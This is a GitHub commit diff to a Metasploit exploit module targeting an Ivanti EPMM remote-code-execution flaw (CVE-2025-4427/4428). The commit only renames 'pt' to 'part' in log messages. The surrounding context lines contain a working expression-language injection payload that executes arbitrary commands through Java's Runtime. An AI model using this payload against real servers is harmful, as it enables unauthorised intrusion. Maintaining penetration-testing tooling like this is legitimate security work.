Skip to content

Commit c255638

Browse files
authored
Reword "pt" to "part" in the Metasploit module
1 parent 68929a5 commit c255638

File tree

1 file changed

+4
-4
lines changed

1 file changed

+4
-4
lines changed

modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -97,7 +97,7 @@ def execute_command(cmd)
9797
# The expression language execution context doesn't like it unless there's a space, so we add one
9898
command = command.gsub('&', ' &')
9999

100-
vprint_status("Payload pt. #{index + 1}/#{commands.length}: #{command}")
100+
vprint_status("Payload part #{index + 1}/#{commands.length}: #{command}")
101101

102102
# Non-blind payload reportedly being used in the wild, returns stdout in response body
103103
payload = "${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('#{command}').getInputStream()).useDelimiter('%5C%5CA').next()}"
@@ -120,13 +120,13 @@ def execute_command(cmd)
120120
# If there's no response and it's not the third fetch payload, the exploit failed
121121
if index != 2
122122
unless resp
123-
fail_with(Failure::Unknown, "Failed to execute command pt #{index + 1}: #{command}")
123+
fail_with(Failure::Unknown, "Failed to execute command part #{index + 1}: #{command}")
124124
end
125125

126-
vprint_status("Command pt #{index + 1} response: #{resp.body}")
126+
vprint_status("Command part #{index + 1} response: #{resp.body}")
127127

128128
else
129-
vprint_status('No command pt 3 response expected')
129+
vprint_status('No command part 3 response expected')
130130
end
131131
end
132132

0 commit comments

Comments
 (0)